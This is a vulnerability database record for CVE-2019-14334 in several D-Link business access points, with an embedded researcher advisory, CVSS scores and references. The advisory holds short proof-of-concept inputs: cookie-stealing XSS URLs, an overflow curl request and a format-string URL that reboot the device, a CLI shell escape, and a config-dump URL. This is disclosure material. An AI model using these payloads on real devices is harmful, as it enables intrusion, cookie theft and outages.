ID

VAR-201908-0912


CVE

CVE-2019-14334


TITLE

Certificate validation vulnerabilities in multiple D-Link devices

Trust: 0.8

sources: JVNDB: JVNDB-2019-007262

DESCRIPTION

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP, DWL-3600AP, DWL-8610AP devices have a certificate validation vulnerability. Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc.

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14).

D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk.

Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019

Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product

D-Link 6600-AP, DWL-3600AP
+ Vulnerability number 2 affects also DWL-8610AP

### Firmware version

4.2.0.14 Revision Ax date: 21/03/2019

### Last version available

https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier

WLAN-EAP

### Hardware Version

A2

### Manufacturer

D-LINK

## Product Description

The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network.

Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS

#### Exploitation: Local

#### Severity Level: High

#### CVE ID : CVE-2019-14338

#### Proof-of-concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Pre-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local

#### Severity Level: High

#### CVE ID: CVE-2019-14333

#### Proof-of-concept

kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface

#### Exploitation: Local

#### Severity Level: High

#### CVE ID : CVE-2019-14337

#### Proof-of-concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local

#### Severity Level: High

#### CVE ID : CVE-2019-14335

#### Proof-of-concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files

#### Exploitation: Local

#### Severity Level: High

#### CVE ID : CVE-2019-14336

#### Proof-of-concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers

#### Exploitation: Local

#### Severity Level: High

#### CVE ID : CVE-2019-14332

#### Proof-of-concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help

## Report Timeline

22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates

ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip

## About me - pwn.sandstorm@gmail.com

#### Independent EMSecurity Researcher in the field of IoT under the Sun

#### Always open to hack and share

#### Greetings - Ack P. Kim and others for the online resources

Trust: 2.34

sources: NVD: CVE-2019-14334 // JVNDB: JVNDB-2019-007262 // CNVD: CNVD-2019-29149 // VULHUB: VHN-146270 // PACKETSTORM: 153840

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-29149

AFFECTED PRODUCTS

vendor: dlink, model: dwl-8610ap, scope: eq, version: 4.2.0.14

Trust: 1.0

vendor: dlink, model: 6600-ap, scope: eq, version: 4.2.0.14

Trust: 1.0

vendor: dlink, model: dwl-3600ap, scope: eq, version: 4.2.0.14

Trust: 1.0

vendor: d link, model: d-link 6600-ap, scope: eq, version: 4.2.0.14

Trust: 0.8

vendor: d link, model: dwl-3600ap, scope: eq, version: 4.2.0.14

Trust: 0.8

vendor: d link, model: dwl-8610ap, scope: eq, version: 4.2.0.14

Trust: 0.8

vendor: d link, model: 6600-ap, scope: -, version: -

Trust: 0.6

vendor: d link, model: dwl-3600ap, scope: -, version: -

Trust: 0.6

vendor: d link, model: dwl-8610ap, scope: -, version: -

Trust: 0.6

sources: CNVD: CNVD-2019-29149 // JVNDB: JVNDB-2019-007262 // NVD: CVE-2019-14334

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-14334
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-14334
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2019-29149
value: LOW

Trust: 0.6

CNNVD: CNNVD-201907-1635
value: MEDIUM

Trust: 0.6

VULHUB: VHN-146270
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2019-14334
severity: LOW
baseScore: 2.1
vectorString: AV:L/AC:L/AU:N/C:P/I:N/A:N
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2019-29149
severity: LOW
baseScore: 2.1
vectorString: AV:L/AC:L/AU:N/C:P/I:N/A:N
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-146270
severity: LOW
baseScore: 2.1
vectorString: AV:L/AC:L/AU:N/C:P/I:N/A:N
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-14334
baseSeverity: MEDIUM
baseScore: 5.5
vectorString: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 1.8
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2019-14334
baseSeverity: MEDIUM
baseScore: 5.5
vectorString: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2019-29149 // VULHUB: VHN-146270 // JVNDB: JVNDB-2019-007262 // CNNVD: CNNVD-201907-1635 // NVD: CVE-2019-14334

PROBLEMTYPE DATA

problemtype:CWE-295

Trust: 1.9

sources: VULHUB: VHN-146270 // JVNDB: JVNDB-2019-007262 // NVD: CVE-2019-14334

THREAT TYPE

local

Trust: 0.6

sources: CNNVD: CNNVD-201907-1635

TYPE

trust management problem

Trust: 0.6

sources: CNNVD: CNNVD-201907-1635

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-007262

PATCH

title: Security Advisory
url: https://us.dlink.com/en/security-advisory

Trust: 0.8

title: Security Bulletin
url: https://www.dlink.com/en/security-bulletin

Trust: 0.8

title: Patch for D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Information Disclosure Vulnerabilities
url: https://www.cnvd.org.cn/patchInfo/show/177597

Trust: 0.6

title: D-Link 6600-AP, DWL-3600AP and DWL-8610AP Security vulnerabilities
url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95744

Trust: 0.6

sources: CNVD: CNVD-2019-29149 // JVNDB: JVNDB-2019-007262 // CNNVD: CNNVD-201907-1635

EXTERNAL IDS

db: NVD, id: CVE-2019-14334

Trust: 3.2

db: PACKETSTORM, id: 153840

Trust: 3.2

db: JVNDB, id: JVNDB-2019-007262

Trust: 0.8

db: CNNVD, id: CNNVD-201907-1635

Trust: 0.7

db: CNVD, id: CNVD-2019-29149

Trust: 0.6

db: VULHUB, id: VHN-146270

Trust: 0.1

sources: CNVD: CNVD-2019-29149 // VULHUB: VHN-146270 // JVNDB: JVNDB-2019-007262 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1635 // NVD: CVE-2019-14334

REFERENCES

url:http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html

Trust: 3.1

url:https://us.dlink.com/en/security-advisory

Trust: 1.7

url:https://www.dlink.com/en/security-bulletin

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2019-14334

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14334

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-14336

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14332

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14335

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14333

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=%s

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=+guest<script>alert('pwned')</script>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14337

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Trust: 0.1

url:http://10.90.90.91/sslcert-get.cgi?

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14338

Trust: 0.1

url:https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=

Trust: 0.1

sources: CNVD: CNVD-2019-29149 // VULHUB: VHN-146270 // JVNDB: JVNDB-2019-007262 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1635 // NVD: CVE-2019-14334

CREDITS

Sandstorm Security

Trust: 0.7

sources: PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1635

SOURCES

db: CNVD, id: CNVD-2019-29149
db: VULHUB, id: VHN-146270
db: JVNDB, id: JVNDB-2019-007262
db: PACKETSTORM, id: 153840
db: CNNVD, id: CNNVD-201907-1635
db: NVD, id: CVE-2019-14334

LAST UPDATE DATE

2024-11-23T21:52:00.519000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2019-29149, date: 2019-08-28T00:00:00
db: VULHUB, id: VHN-146270, date: 2019-08-05T00:00:00
db: JVNDB, id: JVNDB-2019-007262, date: 2019-08-06T00:00:00
db: CNNVD, id: CNNVD-201907-1635, date: 2019-08-06T00:00:00
db: NVD, id: CVE-2019-14334, date: 2024-11-21T04:26:31.880

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2019-29149, date: 2019-08-28T00:00:00
db: VULHUB, id: VHN-146270, date: 2019-08-01T00:00:00
db: JVNDB, id: JVNDB-2019-007262, date: 2019-08-06T00:00:00
db: PACKETSTORM, id: 153840, date: 2019-07-31T19:01:29
db: CNNVD, id: CNNVD-201907-1635, date: 2019-07-31T00:00:00
db: NVD, id: CVE-2019-14334, date: 2019-08-01T13:15:14.100